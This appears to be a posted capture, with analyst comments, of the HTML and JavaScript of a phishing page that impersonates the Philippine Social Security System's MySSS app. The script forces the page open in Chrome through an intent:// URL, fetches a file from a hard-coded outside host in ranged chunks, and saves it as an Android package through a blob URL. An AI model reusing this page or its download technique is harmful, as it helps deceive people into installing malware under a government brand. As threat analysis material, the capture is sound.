
@ajdumanhug
Created June 1, 2025 02:23
Source code of the malicious website pretending to be MySSS
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<!-- Analyst note: "never" is the legacy keyword for the no-referrer policy, so
     requests and navigations made from this page carry no Referer header.
     NOTE(review): presumably this keeps the lure URL out of the download
     host's and any third party's logs; confirm against captured traffic. -->
<meta name="referrer" content="never" />
<!-- Analyst note: the title, description, Open Graph and Twitter card tags
     below all reuse the agency's name and describe the page as the official
     app, so link previews in chat and social apps render with that branding.
     The og:image and favicon are relative paths served by the lure host. -->
<title>Republic of the Philippines Social Security System</title>
<meta
name="description"
content="The MySSS is the official mobile app of the Philippine Social Security System"
/>
<meta
property="og:title"
content="Republic of the Philippines Social Security System"
/>
<meta
name="description"
property="og:description"
content="The MySSS is the official mobile app of the Philippine Social Security System"
/>
<meta property="og:image" content="./assets/og_image.png" />
<meta name="twitter:card" content="summary_large_image" />
<meta
name="twitter:title"
content="Republic of the Philippines Social Security System"
/>
<meta
name="twitter:description"
content="The MySSS is the official mobile app of the Philippine Social Security System"
/>
<link rel="icon" href="./favicon.png" />
<style>
* {
margin: 0;
padding: 0;
}
body {
font-size: 0;
margin: 0;
padding: 0;
max-width: 750px;
margin: auto;
}
.header {
position: sticky;
top: 0;
width: 100%;
border-bottom: 2px solid #cccccc;
}
.content {
position: relative;
}
.w-100 {
width: 100%;
}
.jump {
position: absolute;
bottom: 40px;
width: calc(100% - 30px);
margin: 0 15px;
display: flex;
justify-content: space-around;
align-items: center;
}
.jump > .item {
width: 150px;
height: 50px;
position: relative;
background-color: black;
color: #fff;
font-family: "Google Sans", Roboto, Arial, sans-serif;
font-size: 0.875rem;
letter-spacing: 0.0178571429em;
font-weight: 500;
line-height: 50px;
text-align: center;
border-radius: 5px;
}
.item img {
width: 100%;
}
</style>
<style>
.progress {
position: absolute;
left: 0;
width: 0%;
height: inherit;
border-radius: 3px 0 0 3px;
background-color: rgba(255, 255, 255, 0.3);
-webkit-transition: width 0.2s linear;
-o-transition: width 0.2s linear;
transition: width 0.2s linear;
}
</style>
</head>
<body>
<!-- Analyst note: the visible page is built entirely from images (header,
     link, badges, background); none of the page text is in the DOM apart
     from the progress counter. -->
<img src="./assets/header.png" alt="" draggable="false" class="header" />
<div class="content">
<img src="./assets/link.png" alt="" class="w-100">
<div class="jump">
<!-- Android badge: the click starts the in-page chunked fetch and save
     (handleDownload). The badge image is swapped for a percentage counter
     while the transfer runs. -->
<div class="item" onclick="handleDownload()">
<img src="./assets/android.png" alt="" id="instal" />
<div class="progress"></div>
<span id="status" style="display: none">
<span id="schedule">0</span>%
</span>
</div>
<!-- iOS badge: only calls clickIOS(), which shows an alert. -->
<div class="item" onclick="clickIOS()">
<img src="./assets/ios.png" alt="" />
</div>
</div>
</div>
<img src="./assets/bg.png" alt="" draggable="false" class="w-100" />
<script>
/**
 * Click handler for the iOS badge (wired through onclick in the markup).
 *
 * Analyst note: it only shows an alert. Nothing on this page delivers an iOS
 * file, so the Android badge is the only delivery path visible in the sample.
 */
function clickIOS() {
alert("The system is being upgraded")
}
// Runs once at page load. The condition is true when the user-agent string
// contains "Chrome" but the window.chrome object is missing.
// NOTE(review): that combination presumably identifies an embedded or in-app
// browser (WebView) rather than Chrome itself; confirm on a test device.
// When it matches, the page navigates to an Android intent:// URL rebuilt from
// its own address (host/path after "://", original scheme in scheme=) with
// package=com.android.chrome, i.e. it asks Android to reopen this same page in
// Chrome. For triage, an intent:// navigation that points back at the page's
// own URL is a useful behavioural marker for this sample.
if (
/Chrome/.test(window.navigator.userAgent) &&
!Boolean(window.chrome)
) {
window.location.href =
"intent://" +
window.location.href.split("://")[1] +
"#Intent;scheme=" +
window.location.href.split("://")[0] +
";package=com.android.chrome;end;"
}
// Download configuration, all hard-coded in the page.
// The fetch target is a plain-http URL on a host separate from the relative
// ./assets paths. The "\/" escapes are ordinary slashes in a JS string.
// NOTE(review): the escaped slashes and the comma-stripping of a numeric
// literal below look like values injected by a server-side template (kit
// behaviour); this is an inference, confirm against other captures.
const url = decodeURIComponent("http:\/\/misss.molbiie.com\/x\/xc?name=MySSS")
// Expected total size in bytes; drives both the chunk count and the progress
// percentage. It is never checked against what the server actually returns.
const contentLength = Number("17766999".replaceAll(",", ""))
const urlObj = new URL(url)
// File name offered to the browser: the "name" query parameter wins, otherwise
// the last path segment is used. For the URL above the parameter is present,
// so the saved name is "MySSS" with no extension set by this code.
// The else-if branch appends ".apk" only when the name already contains
// ".apk"; it is not reached for this URL.
// Note: a top-level `var name` in a classic script binds to window.name.
var name = urlObj.pathname.split("/").pop()
if (urlObj.searchParams.get("name")) {
name = urlObj.searchParams.get("name")
} else if (name.includes(".apk")) {
name += ".apk"
}
// Per-chunk byte counters (index = chunk number), summed for the progress bar.
var loadedList = []
// Holds the generated <a download> element once a file has been assembled, so
// a later click can trigger the save again.
var downloadA = null
/**
 * Adds up the elements of an array; used to total the per-chunk byte counters.
 *
 * reduce() is called without an initial value, so an empty array throws a
 * TypeError. The visible caller only runs after loadedList has been filled.
 *
 * @param {number[]} arr - Values to add.
 * @returns {number} The sum of all elements.
 */
function sum(arr) {
return arr.reduce(function (acr, cur) {
return acr + cur
})
}
/**
 * Generic concurrency limiter: starts iteratorFn for every item, keeping at
 * most poolLimit calls in flight when the limit is not larger than the array.
 *
 * In this sample it bounds the number of simultaneous chunk requests.
 *
 * @param {number} poolLimit - Maximum number of concurrent calls.
 * @param {Array} array - Items to process.
 * @param {Function} iteratorFn - Called as iteratorFn(item, array).
 * @returns {Promise<Array>} Results in input order (Promise.all semantics);
 *   rejects as soon as any call rejects.
 */
async function asyncPool(poolLimit, array, iteratorFn) {
const ret = []
const executing = []
for (const item of array) {
// Deferring through Promise.resolve() turns a synchronous throw from
// iteratorFn into a rejection of p.
const p = Promise.resolve().then(() => iteratorFn(item, array))
ret.push(p)
if (poolLimit <= array.length) {
// e removes itself from the in-flight list once p fulfils.
const e = p.then(() => executing.splice(executing.indexOf(e), 1))
executing.push(e)
if (executing.length >= poolLimit) {
// Pool is full: wait for any in-flight call to finish before continuing.
await Promise.race(executing)
}
}
}
return Promise.all(ret)
}
/**
 * Fetches one byte range of the file with XMLHttpRequest and updates the
 * on-page progress indicator while it loads.
 *
 * Analyst notes:
 * - The range is sent in a custom "rangex" request header, not the standard
 *   "Range" header, so the server side has to understand it. That header name
 *   on GET requests is a distinctive network indicator for this sample.
 * - The last chunk is requested open-ended ("bytes=START-").
 * - Only onload and onprogress are set. No onerror or ontimeout handler
 *   exists, so a transport-level failure leaves the promise unsettled.
 *
 * @param {string} url - Download URL.
 * @param {number} start - First byte offset of the chunk.
 * @param {number} end - Last byte offset (ignored for the final chunk).
 * @param {number} i - Chunk index into the global loadedList.
 * @returns {Promise<{index: number, buffer: ArrayBuffer}>} Resolves on a 2xx
 *   response; rejects with Error on any other status or a thrown exception.
 */
function getBinaryContent(url, start, end, i) {
return new Promise((resolve, reject) => {
try {
let xhr = new XMLHttpRequest()
xhr.open("GET", url, true)
xhr.setRequestHeader(
"rangex",
`bytes=${start}-${i === loadedList.length - 1 ? "" : end}`
)
xhr.responseType = "arraybuffer"
xhr.onprogress = function (e) {
// Record this chunk's bytes, then show the total against the hard-coded
// contentLength as a percentage in the counter and the bar width.
loadedList[i] = e.loaded
const percent_complete = Math.floor(
(sum(loadedList) / contentLength) * 100
)
document.querySelector("#schedule").innerText = percent_complete
document.querySelector(".progress").style.width =
percent_complete + "%"
}
xhr.onload = function () {
if (
xhr.readyState === 4 &&
xhr.status >= 200 &&
xhr.status < 300
) {
resolve({
index: i,
buffer: xhr.response,
})
} else {
reject(new Error("Network Error:" + xhr.status))
}
}
xhr.send()
} catch (err) {
reject(new Error(err))
}
})
}
/**
 * Joins a list of typed arrays into one Uint8Array, in list order.
 *
 * In this sample it reassembles the separately fetched chunks into the
 * complete file in memory.
 *
 * @param {Uint8Array[]} arrays - Chunks in the order they should appear.
 * @returns {Uint8Array|null} The combined bytes, or null for an empty list.
 */
function concatenate(arrays) {
if (!arrays.length) return null
let totalLength = arrays.reduce((acc, value) => acc + value.length, 0)
let result = new Uint8Array(totalLength)
// Running write offset into result.
let length = 0
for (let array of arrays) {
result.set(array, length)
length += array.length
}
return result
}
/**
 * Hands the assembled bytes to the browser as a file download.
 *
 * The bytes are wrapped in a Blob labelled with the Android package MIME type,
 * exposed through an object URL, and saved by programmatically clicking a
 * generated <a download> element. The element is kept in the global downloadA
 * so the save can be triggered again without refetching.
 *
 * Analyst note: the file the browser saves comes from a blob: URL created in
 * the page, not from a single HTTP download.
 * NOTE(review): download telemetry keyed on source URL will presumably show a
 * blob: origin here; correlate with the preceding burst of XHR requests to the
 * download host instead. Confirm on a test device.
 *
 * @param {Object} options
 * @param {string} options.name - File name for the download attribute; a
 *   random number is used when it is falsy.
 * @param {Uint8Array} options.buffers - File contents.
 * @param {string} [options.mime] - MIME type for the Blob.
 */
function saveAs({
name,
buffers,
mime = "application/vnd.android.package-archive",
}) {
const blob = new Blob([buffers], { type: mime })
const blobUrl = URL.createObjectURL(blob)
downloadA = document.createElement("a")
downloadA.download = name || Math.random()
downloadA.href = blobUrl
downloadA.click()
}
/**
 * Downloads a file as fixed-size byte ranges and returns it as one buffer.
 *
 * The chunk count comes from the caller-supplied contentLength, not from any
 * server response. Each chunk is fetched by getBinaryContent through
 * asyncPool, and the results are concatenated in chunk order.
 *
 * @param {Object} options
 * @param {string} options.url - Download URL.
 * @param {number} options.contentLength - Assumed total size in bytes.
 * @param {number} [options.chunkSize] - Bytes per chunk; a single chunk is
 *   used when this is not a number.
 * @param {number} [options.poolLimit=1] - Maximum concurrent requests.
 * @returns {Promise<Uint8Array|null>} The reassembled file contents.
 */
async function download({
url,
contentLength,
chunkSize,
poolLimit = 1,
}) {
const chunks =
typeof chunkSize === "number"
? Math.ceil(contentLength / chunkSize)
: 1
// Reset the global progress counters: one slot per chunk.
loadedList = new Array(chunks).fill(0)
const results = await asyncPool(
poolLimit,
[...new Array(chunks).keys()],
(i) => {
let start = i * chunkSize
// The final chunk ends at the last byte of the assumed length.
let end =
i + 1 == chunks ? contentLength - 1 : (i + 1) * chunkSize - 1
return getBinaryContent(url, start, end, i)
}
)
// No sort happens here despite the name: asyncPool returns results in input
// order, which is already chunk order.
const sortedBuffers = results.map((item) => new Uint8Array(item.buffer))
return concatenate(sortedBuffers)
}
/**
 * Click handler for the Android badge: fetches the file in parallel chunks,
 * shows progress, then triggers the browser save.
 *
 * Analyst summary of the flow visible in this sample:
 * 1. A hidden badge image means a transfer is already running, so the click
 *    is ignored.
 * 2. If a file was already assembled, the stored anchor is clicked again. That
 *    branch has no return, so execution continues and the file is fetched and
 *    saved once more.
 * 3. The same user-agent test as at page load redirects to an intent:// URL,
 *    this time without a package= restriction.
 * 4. The file is fetched in 1 MiB chunks, six at a time. With the hard-coded
 *    contentLength that works out to 17 ranged requests.
 * 5. Failures are swallowed: the UI is restored and nothing is shown or
 *    logged.
 */
function handleDownload() {
if (document.querySelector("#instal").style.display === "none") {
return
} else if (downloadA) {
downloadA.click()
// The timer callback repeats the user-agent test with an empty body; it has
// no effect as captured.
setTimeout(function () {
if (
/Chrome/.test(window.navigator.userAgent) &&
!Boolean(window.chrome)
) {
}
}, 1000)
}
if (
/Chrome/.test(window.navigator.userAgent) &&
!Boolean(window.chrome)
) {
window.location.href =
"intent://" +
window.location.href.split("://")[1] +
"#Intent;scheme=" +
window.location.href.split("://")[0] +
";end;"
}
// Switch the badge to the percentage display for the duration of the fetch.
loadedList = []
document.querySelector("#instal").style.display = "none"
document.querySelector("#status").style.display = "inline-block"
download({
url,
contentLength,
chunkSize: 1 * 1024 * 1024,
poolLimit: 6,
})
.then((buffers) => {
saveAs({ name, buffers })
document.querySelector("#instal").style.display = "inline-block"
document.querySelector("#status").style.display = "none"
})
.catch(() => {
document.querySelector("#instal").style.display = "inline-block"
document.querySelector("#status").style.display = "none"
})
}
</script>
</body>
</html>